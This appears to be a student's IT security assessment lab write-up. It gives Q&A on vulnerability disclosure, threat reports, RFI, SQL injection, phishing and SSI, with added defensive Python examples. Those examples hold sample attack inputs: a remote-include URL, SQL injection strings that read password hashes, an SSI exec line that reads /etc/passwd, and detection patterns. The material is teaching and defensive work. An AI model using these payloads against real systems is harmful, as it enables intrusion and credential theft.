Lab 4: Aligning an IT Security Assessment
Vulnerability Life Cycle
· Death is the culmination of the vulnerability life cycle. It occurs when the number of systems still vulnerable to an exploit drops to an insignificant level, whether because vulnerable systems have been patched, old systems have been retired, or attackers have lost interest in the exploit.
Types of Disclosure
· The types of disclosure are listed below.
· Non-disclosure: the policy keeps the information tightly contained so that the general public never learns of its existence.
· Full disclosure: information about system vulnerabilities and attack tools is revealed as fully and as quickly as possible, so that potential victims are as knowledgeable as those who attack them.
· Limited disclosure: the main concept is that vulnerability information is shared with as few individuals as possible.
· Responsible disclosure: during this stage of the vulnerability life cycle the method of discovery determines how responsible disclosure proceeds. Initial contact signals the start of the disclosure stage.
Existing Policies and Proposals
· NTBugtraq disclosure policy
· Rain Forest Puppy's "RFPolicy"
· IETF draft
· The Fisher Plan
Threat Activity Trends
· Organizations should monitor all network-connected computers for signs of malicious activity, including bot activity and potential security breaches, and ensure that any infected computers are removed from the network and disinfected as soon as possible.
· Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware, and adware.
Malicious Code trends
· Monitoring trends in the number of new malicious threats helps improve awareness of their danger and underscores the importance of maintaining robust security, including up-to-date antivirus signatures and software patches.
Phishing, Underground Economy Servers, Spam Trends
· Symantec recommends that enterprise users protect themselves against phishing threats by filtering e-mail at the server level, through the mail transfer agent. Organizations can also use IP-based filtering upstream and HTTP filtering.
There is a long list of reasons why you should do periodic assessments, and an equally long list of excuses for not doing them. An increasing number of organizations are bound by government regulations that dictate which security measures must be in place and how they should be audited. Assessments also tell you whether your security has already been compromised: you might not know unless you look, and you will sleep better at night when you do.
Lab Assessment Questions and Answers
1. What is a PHP Remote File Include attack and why are these prevalent in today's Internet world? A PHP Remote File Include (RFI) attack is an inclusion attack in which the attacker causes the web application to include, and therefore execute, a file hosted on a server the attacker controls, by exploiting an application that dynamically includes external files or scripts based on user-supplied input. They are prevalent because PHP's include/require functions accept a URL when the allow_url_include setting is on (or, in older PHP versions, allow_url_fopen), and a great many applications pass request parameters straight into those functions without validating them.
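The RFI pattern and its fix, as an added example that is not part of the lab: the vulnerable function mirrors the classic `include($_GET['page'] . '.php')` in Python terms, returning whatever include target the application would build, while the hardened function maps the request parameter onto a fixed allowlist instead of building a path or URL from it. The page names, the allowlist, and the attacker URL are constructed for illustration.

```python
"""Added example (not from the lab): the PHP RFI pattern modelled in Python.

include_page_vulnerable mirrors `include($_GET['page'] . '.php')`: with
allow_url_include on, PHP fetches and executes whatever this returns.
include_page_hardened resolves the parameter through an allowlist instead.
The allowlist and the attacker URL are constructed for illustration.
"""
from urllib.parse import urlsplit

# Constructed allowlist: the only pages the application may ever include.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "about": "pages/about.php",
    "contact": "pages/contact.php",
}


def include_page_vulnerable(page: str) -> str:
    """Build the include target the way a vulnerable app does.

    A remote URL or a traversal string flows straight through; the trailing
    '?' in the attacker's URL turns the appended '.php' into a query string.
    """
    return page + ".php"


def include_page_hardened(page: str) -> str:
    """Resolve `page` to a local file via the allowlist, or refuse it."""
    if urlsplit(page).scheme:          # http://, ftp://, php://, data:, ...
        raise ValueError("remote or wrapper URL refused: %r" % page)
    if "/" in page or "\\" in page or ".." in page or "\0" in page:
        raise ValueError("path characters refused: %r" % page)
    try:
        return ALLOWED_PAGES[page]
    except KeyError:
        raise ValueError("unknown page: %r" % page) from None


def is_safe_include(page: str) -> bool:
    """True when the hardened resolver would accept the parameter."""
    try:
        include_page_hardened(page)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    attacker = "http://203.0.113.10/shell.txt?"      # constructed RFI payload
    print(include_page_vulnerable(attacker))         # http://203.0.113.10/shell.txt?.php
    for candidate in ("home", attacker, "php://input", "../../../../etc/passwd%00"):
        try:
            print(candidate, "->", include_page_hardened(candidate))
        except ValueError as err:
            print(candidate, "-> refused:", err)
```

The allowlist is the important part: rejecting schemes and path characters alone still leaves room for unanticipated local files, whereas a dictionary lookup means the request parameter is never interpreted as a path at all.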
2. What country is at the top for Structured Query Language injection and SQL Slammer infections? The U.S. Why can't the U.S. government do anything to prevent these injection attacks and infections? Cybercriminals have made vast improvements to their infrastructure over the last few years, and the attack surface they work against is thousands of privately operated websites that are vulnerable to SQL injection, which no government agency can patch on the owners' behalf.
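What the report is counting, as an added example that is not part of the lab: an in-memory SQLite database with a constructed users table, a lookup that concatenates the request value into the statement, and the same lookup with the value bound as a parameter. The table, its rows, and the two injection strings are invented for illustration.

```python
"""Added example (not from the lab): SQL injection against a constructed
SQLite users table.  find_user_vulnerable concatenates the request value
into the statement, so the value is parsed as SQL; find_user_safe binds it
as a parameter, so it can only ever be a string value."""
import sqlite3

# Constructed sample data; password hashes are placeholders.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
    INSERT INTO users VALUES (1, 'alice', 'x1'), (2, 'bob', 'x2');
""")


def find_user_vulnerable(username: str) -> list:
    """Build the WHERE clause by string concatenation: the input is SQL."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return DB.execute(sql).fetchall()


def find_user_safe(username: str) -> list:
    """Bind the input as a parameter: the database never parses it as SQL."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return DB.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    bypass = "' OR '1'='1"                                    # constructed: always-true WHERE
    exfil = "x' UNION SELECT id, password_hash FROM users --"  # constructed: read another column
    print(find_user_vulnerable(bypass))   # every row: the WHERE clause is always true
    print(find_user_vulnerable(exfil))    # password hashes come back in the username column
    print(find_user_safe(bypass))         # []: no user is literally named that
```

The second payload is the one that matters for an assessment: an always-true clause only bypasses a check, whereas a UNION turns any injectable SELECT into a read of arbitrary tables, which is how injected sites end up feeding the underground economy servers mentioned later in the lab.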
3. What does it mean to have a policy of nondisclosure in an organization? A non-disclosure policy keeps vulnerability information tightly contained so that it is never made public; in practice it is enforced through a non-disclosure agreement, a contract in which the parties agree not to disclose information covered by the agreement.
4. What trends were tracked when it came to malicious code in 2009 by the Symantec Report researched during this lab? DoS attacks remain common; however, the targeted attacks using advanced persistent threats that occurred in 2009 made headlines.
5. What is phishing? Describe what a typical phishing attack attempts to accomplish. Phishing is a term used to describe various scams that use fraudulent e-mail messages, sent by criminals, to trick recipients into divulging personal information.
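The kind of check a server-level filter at the mail transfer agent (the recommendation under "Phishing, Underground Economy Servers, Spam Trends" above) can apply to the message described in this answer, as an added example that is not part of the lab or of Symantec's guidance: it flags a Reply-To domain that differs from the From domain, and HTML links whose visible text shows one host while the href points to another. The sample message, its hostnames and its addresses are constructed.

```python
"""Added example (not from the lab): two phishing indicators an MTA-level
filter can check on an inbound message, run over a constructed sample.
1. Reply-To domain differs from the From domain.
2. A link's visible text is a URL on one host while its href goes to another.
All hostnames and addresses below are invented for illustration."""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message: lookalike reply domain and a misleading link.
SAMPLE = """\
From: "Example Bank" <alerts@example-bank.com>
Reply-To: verify@mail-example-bank.net
Subject: Verify your account
Content-Type: text/html

<p>Please <a href="http://login.example-bank.com.attacker.example/verify">
https://www.example-bank.com/verify</a> within 24 hours.</p>
<p>Help: <a href="https://www.example-bank.com/help">Help center</a></p>
"""


def domain_of(header_value: str) -> str:
    """Domain part of the first address in a From/Reply-To header."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from anchor tags."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def html_body(msg) -> str:
    """First text/html part of the message, or '' if there is none."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            return part.get_payload()
    return ""


def phishing_indicators(raw_message: str) -> list:
    """Return a list of human-readable findings for the raw RFC 822 message."""
    msg = message_from_string(raw_message)
    findings = []
    sender = domain_of(msg.get("From", ""))
    reply_to = domain_of(msg.get("Reply-To", ""))
    if reply_to and reply_to != sender:
        findings.append("reply-to domain %s differs from from domain %s" % (reply_to, sender))
    parser = LinkCollector()
    parser.feed(html_body(msg))
    for href, text in parser.links:
        shown = urlsplit(text).hostname if "://" in text else None
        actual = urlsplit(href).hostname
        if shown and actual and shown != actual:
            findings.append("link text shows %s but href goes to %s" % (shown, actual))
    return findings


if __name__ == "__main__":
    for finding in phishing_indicators(SAMPLE):
        print("FLAG:", finding)
```

Neither indicator is proof on its own (mailing-list software legitimately rewrites Reply-To), which is why filters score such signals rather than reject on any one of them.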
6. What is the Zero Day Initiative? A program that rewards security researchers for responsibly disclosing vulnerabilities. Do you think this is valuable and would you participate if you were the managing partner in a large firm? It is valuable for firms because vulnerabilities are shared with the vendor so that they can be mitigated before more harm is done.
7. What is a Server Side Include? What are the ramifications if an SSI exploit is successful? A Server Side Include is a directive embedded in an HTML page that the web server evaluates before sending the page to the client. An SSI injection attack exploits a web application by injecting such directives, and through them scripts or commands, into HTML pages, allowing arbitrary code to be executed remotely on the server with the web server's privileges. It can be carried out by manipulating SSI directives already in use in the application or by forcing their use through user input fields.
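SSI injection in a guestbook-style page, as an added example that is not part of the lab: it assumes the page is served with Apache's mod_include enabled, so a visitor comment dropped into the page verbatim is evaluated by the server, while the HTML-escaped version is not; `find_ssi_directives` is the check an assessor can run over page sources or submitted input. The comment text is constructed.

```python
"""Added example (not from the lab): SSI injection into a page that the web
server parses with mod_include (assumed), and the escaping that prevents it.
render_entry_vulnerable inserts a visitor comment verbatim; render_entry_hardened
HTML-escapes it; find_ssi_directives detects directives in either output.
The injected comment is constructed for illustration."""
import html
import re

# Directives mod_include understands; `exec` runs a shell command on the server.
# Apache requires the literal prefix "<!--#"; the optional whitespace here is
# deliberately more permissive so the check also catches sloppy attempts.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|include|echo|config|set|fsize|flastmod|printenv)\b", re.I
)


def find_ssi_directives(text: str) -> list:
    """Names of SSI directives present in `text`, in order of appearance."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def render_entry_vulnerable(comment: str) -> str:
    """Insert the comment into the .shtml page unchanged."""
    return '<li class="entry">%s</li>' % comment


def render_entry_hardened(comment: str) -> str:
    """Escape the comment so '<!--#' can no longer reach the server parser."""
    return '<li class="entry">%s</li>' % html.escape(comment, quote=True)


if __name__ == "__main__":
    payload = '<!--#exec cmd="cat /etc/passwd" -->'   # constructed SSI injection
    print(find_ssi_directives(render_entry_vulnerable(payload)))  # ['exec']
    print(find_ssi_directives(render_entry_hardened(payload)))    # []
```

Escaping at output time is the fix; the detector is only there so an assessment can show which pages or inputs still carry raw directives.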
8. According to the TippingPoint Report researched in the lab, how do Server Message Block attacks measure up to Hypertext Transfer Protocol attacks in the recent past? In contrast to HTTP attacks, attacks against the SMB protocol, which is the foundation of countless file shares, have dropped over the sampled time period.
9. According to the TippingPoint Report what are some of the PHP RFI payload effects DVLabs has detected? Password brute force, E-mail/MMS Spam relay, Network flood, Malware dropper, Botnet member, Recon and re-infection.
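Finding the attempts behind the payload effects listed in answer 9 (and the include attack defined in answer 1), as an added example that is not part of the lab or the TippingPoint report: a scan of web server access-log lines for request parameters whose value is a remote URL or a PHP stream wrapper, which is what an RFI probe looks like before any payload runs. The log lines are constructed in Apache combined format using documentation addresses.

```python
"""Added example (not from the lab or the TippingPoint report): scanning
Apache combined-format access-log lines for PHP RFI attempts, i.e. query
parameters whose value is a remote URL or a PHP stream wrapper.
The log lines below are constructed with RFC 5737 documentation addresses."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_LINES = [
    '198.51.100.7 - - [10/Mar/2010:13:55:36 -0500] "GET /index.php?page=home HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Mar/2010:13:55:41 -0500] "GET /index.php?page=http://203.0.113.10/bot.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"',
    '203.0.113.10 - - [10/Mar/2010:13:55:42 -0500] "GET /lib/config.php?root=ftp%3A%2F%2F203.0.113.10%2Fid.txt%3F HTTP/1.1" 200 318 "-" "libwww-perl/5.8"',
    '203.0.113.11 - - [10/Mar/2010:14:01:09 -0500] "POST /view.php?tpl=php://input HTTP/1.1" 200 98 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [10/Mar/2010:14:02:12 -0500] "GET /search.php?q=http%20servers HTTP/1.1" 200 1410 "-" "Mozilla/5.0"',
]

# client, timestamp, method, request target, status from a combined-format line
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
PHP_WRAPPERS = {"php", "data", "expect", "phar", "zip", "compress.zlib"}


def classify_value(value: str):
    """'remote-url', 'php-wrapper', or None for an ordinary parameter value."""
    scheme = urlsplit(value).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "remote-url"
    if scheme in PHP_WRAPPERS:
        return "php-wrapper"
    return None


def scan_access_log(lines) -> list:
    """One record per suspicious parameter, in log order."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, timestamp, method, target, status = match.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = unquote(value)        # parse_qsl already decodes once; handle double encoding
            kind = classify_value(decoded)
            if kind:
                hits.append({"client": client, "time": timestamp, "method": method,
                             "path": parts.path, "param": name, "value": decoded,
                             "kind": kind, "status": int(status)})
    return hits


def attempts_by_client(hits) -> dict:
    """Count of RFI attempts per source address, for blocking or follow-up."""
    return dict(Counter(h["client"] for h in hits))


if __name__ == "__main__":
    found = scan_access_log(LOG_LINES)
    for h in found:
        print("%(client)s %(method)s %(path)s %(param)s=%(value)s [%(kind)s, %(status)s]" % h)
    print(attempts_by_client(found))
```

A 200 response to one of these requests is not by itself proof of compromise (the application may have ignored the parameter), so the follow-up is to pull the response sizes and the outbound connection logs for the flagged hosts, which is where the spam-relay, flood and bot-join effects from answer 9 would show up.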
10. Explain the steps it takes to execute a malicious PDF attack as described in the TippingPoint report. The vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit it: the target must visit a malicious page or open a malicious PDF file, at which point the embedded exploit runs with the user's privileges.
11. What is a Zero Day attack and how does this relate to an organization's vulnerability window? It is an attack that exploits a previously unknown vulnerability in a computer application, one that the developers have not had time to address and patch. For the organization this means the vulnerability window, the time between the flaw becoming exploitable and a patch being available and applied, is already open before anyone knows it exists.
12. How can you mitigate the risk from users and employees clicking on an embedded URL link or e-mail attachment from unknown sources? Keep the controls the government organization already has in place to combat malicious e-mail, connect to the Internet through a Trusted Internet Connection, and take measures to harden the PCs the users actually work on.
13. When auditing an organization for compliance, what role do IT security policies and an IT security policy framework play in the compliance audit? Since IT systems are used to generate, change, house, and transport the regulated data, IT personnel have to build the controls, guided by those policies, that ensure the information stands up to audit scrutiny.
14. When performing a security assessment why is it a good idea to examine compliance in separate compartments such as the seven domains of a typical IT infrastructure? Each domain has different degrees of risk that require different mitigation solutions. Each domain will have different standards to meet compliance requirements.
15. True or False: Auditing for compliance and performing security assessments to achieve compliance require a checklist of compliance requirements. True.